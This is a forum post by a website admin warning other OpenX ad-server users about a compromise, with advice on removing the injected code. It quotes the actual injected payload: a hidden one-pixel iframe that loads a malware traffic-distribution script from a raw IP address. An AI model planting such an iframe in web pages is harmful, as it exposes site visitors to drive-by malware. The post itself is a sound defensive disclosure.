5011 views

0 Members and 1 Guest are viewing this topic.


Offline AshSimmonds

  • Geekitecht

  • Joined: Feb 2006

  • Drives: GF's shitbox :(
  • Location: Adelayed
  • Name: Humble Narrator
  • www: AshSimmonds.com
Just a quick note for any folks running a site and using the OpenX banner ad serving software, this morning AE was hit by an attack where an IFRAME was embedded within the banner script which requests data from a malware site.

In our case the actual link was:

Code: [Select]
<iframe src="http://194.8.250.219/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>
...which for some reason is a Google server, so if you are logged into your Google account, Google's break out of frames script would redirect you back to Google homepage.

The IP inserted is different on many other people's servers, you can find them by Googling OpenX tds/in.cgi.

The basics are that the malware iframe code was injected into the MySQL database somehow into the "Append and prepend settings" in OpenX where it tells the server to "Always append the following HTML code to banners displayed by this zone".

Just remove that append code and it's fixed - but it will be annoying if you're running dozens of banners, lucky for me we don't have many advertisers yet.  :thumbsup:

I think I'll be using this opportunity to move away from OpenX, anyone tried Google Ad Manager/DoubleClick for Publishers?

Here's an example of what it looks like in the admin part of the banner, and where the code has been injected:




Latest Discussions

BOARD TOPIC MEMBER POSTED
[ Cars ] HEARING AIDS cjay Today at 19:44
[ Off Topic ] The SA BS thread dkabab Today at 19:22
[ Cars ] Maserati Gransport Keys dodger Today at 19:06
[ Cars ] Spotted thread jmillard308 Today at 18:57
[ Lamborghini ] Huracan Performante shack Today at 18:35
[ BMW M Power ] BMW 8 Series Concept JPG Today at 18:33
[ Maserati Videos ] Maserati Granturismo used as BAIT Car! Paulstar Today at 14:49
[ Funny Cool Stoopid ] Jokes PA Today at 12:55